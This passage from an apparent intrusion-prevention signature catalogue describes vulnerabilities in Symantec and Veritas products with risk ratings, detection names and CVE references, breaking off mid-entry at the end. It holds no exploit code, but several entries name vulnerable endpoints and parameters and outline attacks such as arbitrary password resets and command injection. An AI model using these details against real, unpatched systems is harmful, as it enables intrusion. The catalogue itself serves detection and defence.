https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112
BID-44299
http://www.securityfocus.com/bid/44299
OSVDB-68901
http://www.osvdb.org/68901
Back to top

Symantec-IM-Manager-Multiple-Cross-Site-Scripting

About this vulnerability: A vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec IM Manager
Type: Input Validation
Description: There are multiple Cross Site Scripting vulnerabilities in the Symantec IM Manager management console. The vulnerabilities are due to improperly sanitized input of URL parameters to various pages of the management console. A remote attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted link to the management console. Successful exploitation results in arbitrary HTML or script code injection. The injected code runs in the browser context of the current user.
Situation: HTTP_CSU-Symantec-IM-Manager-Multiple-Cross-Site-Scripting
References:
CVE-2011-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0552
BID-49739
http://www.securityfocus.com/bid/49739
OSVDB-75981
http://www.osvdb.org/75981
Back to top

Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections

About this vulnerability: An SQL injection vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec IM Manager
Type: SQL Injection
Description: There is an SQL injection vulnerability in Symantec IM Manager. A remote unauthenticated attacker can send a malicious HTTP request to execute SQL statements on the vulnerable server, which can result in disclosure of sensitive information, data manipulation, or command execution.
Situation: HTTP_CRL-Symantec-IM-Manager-rdpageimlogic.aspx-SQL-Injections
References:
CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112
BID-44299
http://www.securityfocus.com/bid/44299
OSVDB-68901
http://www.osvdb.org/68901
Back to top

Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution

About this vulnerability: A vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec IM Manager
Type: Input Validation
Description: A code execution vulnerability exists in Symantec IM Manager Web Interface. The vulnerability is due to improper input validation on the rdProcess variable in rdprocess.aspx. As a result, an attacker can abuse this vulnerability to load a process configuration file from a remote network share which can lead to command execution. A remote attacker can exploit this vulnerability by sending specially crafted request to the web Interface. Successful exploitation will result in execution of arbitrary code in the context of the web server.
Situation: HTTP_CSU-Symantec-IM-Manager-Web-Interface-Processaction-Code-Execution
References:
CVE-2011-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0554
BID-49742
http://www.securityfocus.com/bid/49742
Back to top

Symantec-Liveupdate-Administrator-Security-Bypass

About this vulnerability: A vulnerability in Symantec LiveUpdate Administrator
Risk: High
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec LiveUpdate Administrator
Type: Malfunction
Description: A security policy bypass vulnerability exists in Symantec LiveUpdate Administrator. The vulnerability is due to a failure to validate temporary passwords when processing a user account password reset. This can result in an arbitrary password reset. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious request to forcepasswd.do, providing a LiveUpdate Administrator victim email, and a new password, effectively setting the victim user password to any arbitrary value. Successful exploitation could lead to security policy bypass and access to sensitive information.
Situation: HTTP_CRL-Symantec-Liveupdate-Administrator-Security-Bypass
References:
CVE-2014-1644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1644
BID-66399
http://www.securityfocus.com/bid/66399
OSVDB-105090
http://www.osvdb.org/105090
Back to top

Symantec-Messaging-Gateway-Directory-Traversal

About this vulnerability: A vulnerability in Symantec Messaging Gateway
Risk: Moderate
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Symantec Messaging Gateway
Type: Directory Traversal
Description: Two directory traversal vulnerabilities exist in Symantec Messaging Gateway. The vulnerabilities are due to an input validation error when accepting user input. The vulnerability can result in information disclosure. By sending crafted requests, a remote, authenticated attacker can exploit this vulnerability to disclose sensitive information on the server.
Situation: HTTP_CRL-Symantec-Messaging-Gateway-Directory-Traversal
References:
CVE-2012-4347
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4347
BID-56789
http://www.securityfocus.com/bid/56789
Back to top

Symantec-Messaging-Gateway-Management-Console-Cross-Site-Scripting

About this vulnerability: A vulnerability in Symantec Messaging Gateway
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Messaging Gateway
Type: Input Validation
Description: A reflected Cross-Site Scripting vulnerability exists in Symantec Messaging Gateway Management Console. The vulnerability is due to insufficient input validation of the "displayTab" parameter. A remote unauthenticated attacker can exploit this vulnerability to execute arbitrary script code in the context of the affected user's browser session by enticing the user to visit a malicious page.
Situation: HTTP_CSU-Messaging-Gateway-Management-Console-Cross-Site-Scripting
References:
CVE-2014-1648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1648
BID-66966
http://www.securityfocus.com/bid/66966
OSVDB-106171
http://www.osvdb.org/106171
Back to top

Symantec-Messaging-Gateway-Performrestore-Command-Injection

About this vulnerability: A vulnerability in Symantec Messaging Gateway
Risk: Moderate
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Messaging Gateway
Type: Input Validation
Description: Improper handling of HTTP request parameters causes a command injection vulnerability in Symantec Messaging Gateway. A successful attack allows arbitrary commands to be executed on the target system with administrative privileges.
Situation: HTTP_CRL-Symantec-Messaging-Gateway-Performrestore-Command-Injection
References:
CVE-2017-6327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6327
Back to top

Symantec-Messaging-Gateway-Remote-Code-Execution

About this vulnerability: A Symantec Messaging Gateway Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Symantec Messaging Gateway
Type: Input Validation
Description: A vulnerability in Symantec Messaging Gateway, versions 10.6.2-7, which allows remote attackers to execute arbitrary code due to improper validation to the backupNow.do endpoint.
Situation: HTTP_CRL-Symantec-Messaging-Gateway-Remote-Code-Execution
References:
CVE-2017-6326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6326
Back to top

Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery

About this vulnerability: A Symantec Messaging Gateway Save.do Cross Site Request Forgery vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Messaging Gateway
Type: Input Validation
Description: A vulnerability in Symantec Messaging Gateway which allows remote attackers to add an administration user to the target system by getting a target user to view crafted web content, due to input validation errors when accepting user input.
Situation: HTTP_CSH-Symantec-Messaging-Gateway-Save.do-Cross-Site-Request-Forgery
References:
CVE-2012-0308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0308
Back to top

Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Altiris Deployment Solution
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Altiris Deployment Solution; Symantec Altiris Notification Server; Symantec Management Platform
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in multiple Symantec products. The vulnerability is due to an error in the AeXNSConsoleUtilities.dll ActiveX control when processing overly long arguments passed to the BrowseAndSaveFile() method. This vulnerability can be exploited by remote attackers to execute arbitrary code on the target system by enticing the user into visiting a specially crafted web page. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
File-Text_Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
References:
CVE-2009-3031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3031
BID-36698
http://www.securityfocus.com/bid/36698
Back to top

Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Altiris Deployment Solution
Risk: High
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Altiris Deployment Solution; Symantec Altiris Notification Server; Symantec Management Platform
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in multiple Symantec products.
Situation: HTTP_SS-Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
File-Text_Symantec-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
References:
CVE-2009-3033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3033
BID-37092
http://www.securityfocus.com/bid/37092
OSVDB-60496
http://www.osvdb.org/60496
Back to top

Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service

About this vulnerability: A vulnerability in Symantec Gateway Security
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Gateway Security
Type: Malfunction
Description: There is a vulnerability in the way a component of multiple Symantec products processes ISAKMP messages. The vulnerability allows a malicious user to create a denial of service condition on the targeted service. When the target receives a malformed ISAKMP packet, a memory violation error will be triggered in the vulnerable isakmpd process which will result in the termination of the process. The isakmpd process will be restarted by the system after a short delay. Since there is a delay in the restart of the isakmpd service, an attacker repeatedly sending the malformed packet could cause a Denial of Service condition on the targeted service.
Situation: Generic_UDP-Symantec-Multiple-Products-ISAKMPD-Denial-Of-Service
References:
CVE-2004-0369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0369
BID-11039
http://www.securityfocus.com/bid/11039
Back to top

Symantec-Multiple-Products-Vrtsweb-Code-Execution

About this vulnerability: An input validation vulnerability in Symantec Veritas backup
Risk: High
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Backup Exec for Windows Server; Veritas Software NetBackup; Veritas Software BackUp Exec
Type: Input Validation
Description: There is an input validation vulnerability in multiple Symantec Veritas backup products that embed the VERITAS Web Server (VRTSweb) component. The flaw is due to a design weakness when processing requests sent to the target host on port TCP/14300. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in execution of arbitrary code within the security context of the SYSTEM user.
Situation: Generic_CS-Symantec-Multiple-Products-Vrtsweb-Code-Execution
References:
CVE-2009-3027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3027
BID-37012
http://www.securityfocus.com/bid/37012
OSVDB-60884
http://www.osvdb.org/60884
Back to top

Symantec-Norton-AntiVirus-Stack-Exhaustion

About this vulnerability: A vulnerability in Symantec Norton AntiVirus
Risk: Moderate
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton AntiVirus
Type: Buffer Overflow
Description: A vulnerability has been reported in several Symantec products. One of the dynamic link libraries installed by the vulnerable product contains a remotely scriptable ActiveX object which lacks proper input data validation mechanisms. An attacker may instantiate the vulnerable object and supply malicious input data to its function to cause stack exhaustion.
Situation: HTTP_SS-Symantec-Norton-AntiVirus-Stack-Exhaustion
File-Text_Symantec-Norton-AntiVirus-Stack-Exhaustion
Back to top

Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption

About this vulnerability: A vulnerability in Symantec Norton AntiSpam
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton AntiSpam; Symantec Norton Internet Security; Symantec Norton Personal Firewall
Type: Malfunction
Description: The Symantec firewall product line is vulnerable to a remote heap corruption attack in the processing of a specially crafted NetBIOS Name Service Response message. If an attacker is able to send a UDP datagram with a source port of 137 to a vulnerable host, and the victim allows incoming UDP datagrams to destination UDP port 137, it is possible for the attacker to trigger a denial of service condition, or execute arbitrary code with kernel privileges. In a simple exploit case, the vulnerable system blue-screened with the error message &quot;DRIVER_IRQL_NOT_LESS_OR_EQUAL&quot; in symtdi.sys. However, if the exploit packet is properly crafted, it is possible for the remote attacker to manipulate the value for the internal heap memory block header. Then the attacker could control the memory location that the allocated for packet data. It is possible the attacker could write arbitrary code on to the specified heap memory location then run the codes of its own, with kernel privileges.
Situation: Generic_UDP-Symantec-Norton-Firewall-NBNS-Response-Remote-Heap-Corruption
References:
CVE-2004-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0444
BID-10335
http://www.securityfocus.com/bid/10335
OSVDB-6102
http://www.osvdb.org/6102
OSVDB-6101
http://www.osvdb.org/6101
OSVDB-6099
http://www.osvdb.org/6099
Back to top

Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass

About this vulnerability: Symantec Norton Internet Security 2006 COM Object Security Bypass
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton Internet Security
Type: Malfunction
Description: There is a vulnerability in Symantec Norton Internet Security 2006 that could allow a remote attacker to execute arbitrary code.
Situation: File-Text_Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass-Vulnerability
References:
CVE-2006-3456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3456
BID-23822
http://www.securityfocus.com/bid/23822
OSVDB-35075
http://www.osvdb.org/35075
Back to top

Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow

About this vulnerability: Symantec Norton Personal Firewall 2004 ActiveX Control Buffer Overflow
Risk: Low
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Symantec Norton Personal Firewall; Symantec Norton Internet Security
Type: Malfunction
Description: A stack buffer overflow vulnerability exists in Symantec Norton Personal Firewall that could allow a remote attacker to execute arbitrary code on a vulnerable system.
Situation: File-Text_Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-1689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1689
BID-23936
http://www.securityfocus.com/bid/23936
OSVDB-36164
http://www.osvdb.org/36164
Back to top

Symantec-pcAnywhere-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec pcAnywhere
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec pcAnywhere
Type: Buffer Overflow
Description: There exists a denial of service vulnerability in Symantec pcAnywhere. The vulnerability is caused due to improper boundary checking and can be exploited to cause a buffer overflow prior to authentication. A remote unauthenticated attacker can exploit the vulnerability to terminate the application, causing a denial of service condition.
Situation: Generic_CS-Symantec-pcAnywhere-Buffer-Overflow
Back to top

Symantec-pcAnywhere-Usage

About this vulnerability: Symantec pcAnywhere usage
Risk: Low
First detected in: sgpkg-ips-276-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec pcAnywhere
Type: Remote Control
Description: Symantec pcAnywhere is remote control application that allows sharing of desktop connections across machines. Use of this kind of applications may be considered a security risk in controlled environments.
Situation: Generic_SS-Symantec-pcAnywhere-Server-Reply
Generic_UDP-Symantec-pcAnywhere-Client-Name-Query
Generic_UDP-Symantec-pcAnywhere-Client-Name-Reply
Back to top

Symantec-Scan-Engine-Authentication-Bypass

About this vulnerability: A Symantec Scan Engine Authentication Bypass vulnerability
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec AntiVirus Scan Engine
Type: Configuration Error
Description: A vulnerability in Symantec Scan Engine which allows remote attackers to change the administrator's password by sending an arbitrary password hash, due to the lack of a verification check in the server side authentication mechanism.
Situation: HTTP_CRL-Symantec-Scan-Engine-Authentication-Bypass
References:
CVE-2006-0230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230
Back to top

Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Veritas Dynamic Multi-Pathing (DMP)
Risk: Moderate
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup; Symantec Veritas Storage Foundation
Type: Buffer Overflow
Description: Multiple buffer overflow vulnerabilities have been reported in Symantec's Veritas Administrator service, which is a component of multiple Symantec products, including variousStorage Foundation products. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted packets to the affected service. Successful exploitation of these vulnerabilities could result in execution of arbitrary code in the security context of the affected service (vxsvc), which is SYSTEM or root.
Situation: Generic_CS-Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow
References:
CVE-2011-0547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0547
BID-49014
http://www.securityfocus.com/bid/49014
Back to top

Symantec-Veritas-NetBackup-Command-Chaining

About this vulnerability: A vulnerability in Symantec VERITAS NetBackup
Risk: High
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Input Validation
Description: There is a logic error in Symantec's VERITAS NetBackup products. The flaw is due to improper data validation of remotely received network messages. A remote authenticated attacker may exploit this vulnerability by appending malicious commands to a valid command, which could be executed on the target system with SYSTEM level privileges.
Situation: Generic_Symantec-Veritas-NetBackup-Command-Chaining
References:
CVE-2006-4902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4902
BID-21565
http://www.securityfocus.com/bid/21565
Back to top

Symantec-Veritas-NetBackup-Connect_Options-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Symantec VERITAS NetBackup
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: Symantec VERITAS NetBackup has a buffer overflow vulnerability. By calling the vulnerable CONNECT_OPTIONS command with a crafted hostname parameter, a remote attacker can execute arbitrary code with System privileges.
Situation: Generic_Symantec-Veritas-NetBackup-Connect-Option-Request-Buffer-Overflow
References:
CVE-2006-5822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5822
BID-21565
http://www.securityfocus.com/bid/21565
Back to top

Symantec-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow

About this vulnerability: Arbitrary code execution vulnerability in Symantec Veritas NetBackup Volume Manager Daemon
Risk: Moderate
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veritas Software NetBackup
Type: Buffer Overflow
Description: Symantec VERITAS NetBackup Volume Manager Daemon suffers from a buffer overflow. Certain commands of the proprietary protocol used by the daemon are parsed incorrectly, leading to a buffer overflow. The vulnerability allows remote attackers to execute arbitrary code or cause a denial of service by crashing the service via a malformed protocol message using long strings as arguments.
Situation: Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow
References:
CVE-2006-0989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0989
BID-17264
http://www.securityfocus.com/bid/17264
OSVDB-24172
http://www.osvdb.org/24172
Back to top

Symantec-Veritas-Storage-Foundation-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Veritas Storage Foundation
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Veritas Storage Foundation
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Symantec Veritas Storage Foundation suite.
Situation: Generic_UDP-Symantec-Veritas-Storage-Foundation-Buffer-Overflow
References:
CVE-2008-0638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0638
BID-25778
http://www.securityfocus.com/bid/25778
Back to top

Symantec-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass

About this vulnerability: A vulnerability in Symantec Veritas Storage Foundation for Windows
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Veritas Storage Foundation
Type: Malfunction
Description: A security bypass vulnerability exists in Symantec Veritas Storage Foundation Scheduler Service.
Situation: Generic_SS-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass
References:
CVE-2008-3703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3703
BID-30596
http://www.securityfocus.com/bid/30596
Back to top

Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: Moderate
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Symantec Web Gateway. The vulnerability is due to an input validation error in blocklist.php. An attacker can exploit the vulnerability by enticing a user to click on a malicious link.
Situation: HTTP_CSU-Symantec-Web-Gateway-Blacklist.PHP-Cross-Site-Scripting
References:
CVE-2013-5013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5013
BID-65405
http://www.securityfocus.com/bid/65405
OSVDB-103144
http://www.osvdb.org/103144
Back to top

Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: High
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: SQL Injection
Description: There is a blind SQL injection vulnerability in Symantec Web Gateway. The vulnerability is due to a lack of proper sanitization of the id HTTP parameter passed to the blocked.php page. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted HTTP traffic to a vulnerable target server. A successful exploitation attempt could result in the execution of SQL commands, leading to information disclosure, a denial-of-service condition, or possibly other effects.
Situation: HTTP_CSU-Symantec-Web-Gateway-Blocked.php-Blind-SQL-Injection
References:
CVE-2012-2574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2574
BID-54424
http://www.securityfocus.com/bid/54424
OSVDB-84118
http://www.osvdb.org/84118
Back to top

Symantec-Web-Gateway-Dbutils.php-SQL-Injection

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: Moderate
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: SQL Injection
Description: An SQL injection vulnerability exists in Symantec Web Gateway. The vulnerability is due to lack of proper sanitization of the "hostname" HTTP parameter passed to some PHP pages. A remote, authenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the vulnerable target server. A successful exploitation attempt could result in the execution of SQL commands, leading to information disclosure, corruption of the database, a denial-of-service condition, corruption of the database, and possibly other effects.
Situation: HTTP_CRL-Symantec-Web-Gateway-Dbutils.php-SQL-Injection
References:
CVE-2014-1651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1651
BID-67754
http://www.securityfocus.com/bid/67754
OSVDB-108183
http://www.osvdb.org/108183
Back to top

Symantec-Web-Gateway-Input-Validation-Vulnerability

About this vulnerability: An input validation vulnerability in Symantec Web Gateway file-management scripts.
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: An input validation vulnerability in the file-management scripts of Symantec Web Gateway, 5.0.x before 5.0.3, allow remote attackers to upload arbitrary code to a designated path and possibly execute this code.
Situation: HTTP_CS-Symantec-Web-Gateway-Input-Validation-Vulnerability
References:
CVE-2012-0299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0299
BID-53443
http://www.securityfocus.com/bid/53443
OSVDB-82025
http://www.osvdb.org/82025
Back to top

Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: High
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: There is a remote command execution vulnerability in Symantec Web Gateway. The vulnerability is due to improper input validation. Remote, unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary PHP script code or shell command in the context of the affected server.
Situation: HTTP_CSU-Symantec-Web-Gateway-Management-Console-Remote-Shell-Command-Execution
References:
CVE-2012-0297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0297
BID-53444
http://www.securityfocus.com/bid/53444
OSVDB-82023
http://www.osvdb.org/82023
Back to top

Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: A cross-site scripting vulnerability exists in Symantec Web Gateway. The vulnerability is due to improper validation of "variable[]", "operator[]", "other[]" and "operand[]" parameters of several php pages including but not limited to "entSummary.php", "custom_report.php", "host_spy_report.php" and "repairedclients.php" pages. An attacker can exploit this vulnerability by enticing a user to click on a malicious link. A successful attack will result in execution of arbitrary script code in the context of the affected user's browser session.
Situation: HTTP_CRL-Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting
References:
CVE-2014-1652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1652
BID-67755
http://www.securityfocus.com/bid/67755
OSVDB-108184
http://www.osvdb.org/108184
Back to top

Symantec-Web-Gateway-OS-Command-Injection

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: High
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: A command injection vulnerability exists in Symantec Web Gateway. The vulnerability is due to insufficient input validation by existing application scripts accessible though the SWG console's interface. A remote authenticated attacker can leverage this vulnerability to inject and execute commands with SYSTEM privileges.
Situation: HTTP_CSH-Symantec-Web-Gateway-OS-Command-Injection
References:
CVE-2014-7285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7285
BID-71620
http://www.securityfocus.com/bid/71620
OSVDB-116009
http://www.osvdb.org/116009
Back to top

Symantec-Web-Gateway-OS-Command-Injection-CVE-2016-5313

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: Moderate
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: Insufficient validation of request parameters causes a command injection vulnerability in Symantec Web Gateway. A successful exploitation can allow an attacer to run arbitrary code on the target system.
Situation: HTTP_CRL-Symantec-Web-Gateway-OS-Command-Injection
References:
CVE-2016-5313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5313
Back to top

Symantec-Web-Gateway-Pbcontrol.php-Command-Injection

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: Moderate
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: There is a remote command execution vulnerability in Symantec Web Gateway. The vulnerability is due to improper input validation in pbcontrol.php. Remote, unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary commands in the security context of the affected server.
Situation: HTTP_CRL-Symantec-Web-Gateway-Pbcontrol.php-Command-Injection
References:
CVE-2012-2953
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2953
BID-54426
http://www.securityfocus.com/bid/54426
OSVDB-84120
http://www.osvdb.org/84120
Back to top

Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities

About this vulnerability: A vulnerability in Symantec Web Gateway
Risk: Moderate
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Web Gateway
Type: Input Validation
Description: Multiple cross-site scripting (XSS) vulnerabilities have been discovered in Symantec's Web Gateway management console. The vulnerabilities are due to input validation errors in various parameters passed to timer.php. An unauthenticated, remote attacker can exploit these vulnerabilities by enticing a target user to access a crafted URL or perform a crafted HTTP request. A successful attack attempt could result in the execution of arbitrary script code in the target user's browser in the security context of the vulnerable web interface.
Situation: HTTP_CRL-Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities
References:
CVE-2012-0296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0296
BID-53396
http://www.securityfocus.com/bid/53396
OSVDB-82022
http://www.osvdb.org/82022
Back to top

Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Symantec Workspace Streaming
Risk: Moderate
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Workspace Streaming
Type: Malfunction
Description: An arbitrary file upload vulnerability exists in Symantec Workspace. The vulnerability is due to lack of access control validation in the functionality used to process XMLRPC requests. A remote unauthenticated attacker could exploit this vulnerability by a sending specially crafted XML-RPC request to the server. Successful exploitation could lead to unauthorized access to sensitive server-side files and functionality. Further exploitation could lead to code execution in the security context of the application through the use of arbitrary file upload.
Situation: HTTP_CS-Symantec-Workspace-Streaming-XML-RPC-Arbitrary-File-Upload
References:
CVE-2014-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1649
BID-67189
http://www.securityfocus.com/bid/67189
OSVDB-106923
http://www.osvdb.org/106923
Back to top

Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution

About this vulnerability: An attempt to exploit a vulnerability in a Microchip SyncServer module detected
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Linux
Software: Microchip SyncServer
Type: Input Validation
